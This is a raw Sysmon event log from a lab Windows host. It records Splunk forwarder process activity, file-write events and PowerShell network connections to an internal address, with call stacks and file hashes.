18:17:44.739{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:44.739{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086011Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.739{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4FC8-613A-7B90-03000000C801}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086010Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.739{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FC8-613A-7B90-03000000C801}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086009Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.724{B81B27B7-4FC8-613A-7B90-03000000C801}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035086008Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:09.118{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56785-false10.0.1.12-8000- 23542300x800000000000000035086007Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.608{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76D93979F7233A1540DEC9FE740C86B3,SHA256=9BFEE937ACF84EBEBF314180F3A175D87E32819B8CFCB08F2290710D2EAE5AF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086006Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.608{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=544DBF79FE12163B0E1D5CB40B67C1A2,SHA256=BF1AECD71CD03AE563256CFEEA56F0C91A8CC0B63DB42BA6ED74041A4CD1057A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086005Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.276{B81B27B7-4FC8-613A-7A90-03000000C801}432836C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086004Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.124{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FC8-613A-7A90-03000000C801}432C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086003Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.124{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086002Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:44.124{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086001Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.124{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086000Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:44.124{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085999Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.124{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4FC8-613A-7A90-03000000C801}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085998Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.124{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FC8-613A-7A90-03000000C801}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085997Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.109{B81B27B7-4FC8-613A-7A90-03000000C801}432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:45.955{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76D93979F7233A1540DEC9FE740C86B3,SHA256=9BFEE937ACF84EBEBF314180F3A175D87E32819B8CFCB08F2290710D2EAE5AF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035086020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:45.890{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41F21FBBB0F4807C8E0E8DCEE722AC1F,SHA256=A9A1AEDE7D6E23F345BCB627672A40936CBDA4A33DDD5AB97A4E3296C1BBBF96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:09.865{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56786-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:46.905{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A3350D0053FED592BCF227EDBAD248D,SHA256=271EAAE00FA483C583E896BB32A416AACF862A987BC78665202903432C1162D5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:47.910{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=955183B13759E09B967B7E5B583B6795,SHA256=580DEDA41CF5D757195F4D440539078C87025165B8ED42F6A0DBF91A3F24A9CC,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000035086024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:48.925{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4532CCFEB0AB3E3A654C833621393A46,SHA256=728A84A5ED2924FEF0C1C3FE89716D4E9684F2F5882E0D70189CB75BDD507701,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:49.958{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=959353A377E7CCAE78BA2EC7F8E1D20B,SHA256=55D8E01CA94FC6C98B782CF435C578494AE7A296C3EFCA255CDAA5683FC63B69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:14.235{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56787-false10.0.1.12-8000- 354300x800000000000000035086028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:14.873{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56788-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:50.040{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EC65C05B2D7FF2F8F82D79FF09C32692,SHA256=38EA8F883107BB4DC8F75C68D21FA1B15DDFC0F1819941E9609E25D239F78C0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:51.008{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07FBB7148A79698A1E7F133B4D1398AD,SHA256=EDFBE835F8FA12EC6AA6270D2544570C49284D658B52B362551E0F0A4898913F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:52.038{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDCEB16490B49AF771C694CE7AD3888F,SHA256=A1EFC339D06BC36A35786E0B62ABA5BC0B1159FF81D91D9F50B966641FD8FE6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:53.906{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E435525C33C0D6C331523453139EAA47,SHA256=84DDA71B973CD8FA762EF84DA7B4A3547832E7D1A8FEF3D3D9FC8944102B3187,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:53.056{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C079AC86E50CFF7CC2F81FE19393B5B,SHA256=239AE3D1917039979426F2A846D4365A1ABD47BA0CC4DEC3522A17E6AA6FEEFA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:18.885{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56789-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:54.973{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:54.090{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74D7E08FA57C0BAFEB72C4FF0FAE340A,SHA256=37333848ECA89CFC013BAD28971E78E51E8FF37B70C53A8BD81D38B85052B5FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:55.105{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DA55556832CD6FBBB2AD898AAB12F78,SHA256=963684C3255F3D0E53F0FE40034FE9E38E13B1407A5013820F41494D4E7FABCF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:56.887{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla 
Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a47|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\user32.DLL+121e4|C:\Windows\System32\user32.DLL+11b2c 10341000x800000000000000035086042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:56.887{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla 
Firefox\firefox.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419b2|C:\Windows\System32\windows.storage.dll+141373|C:\Windows\System32\windows.storage.dll+1411f9|C:\Windows\System32\windows.storage.dll+53731|C:\Windows\System32\windows.storage.dll+53679|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\user32.DLL+121e4|C:\Windows\System32\user32.DLL+11b2c 10341000x800000000000000035086041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:56.887{B81B27B7-5BF5-611D-6D04-00000000C801}50043344C:\Program Files\Mozilla 
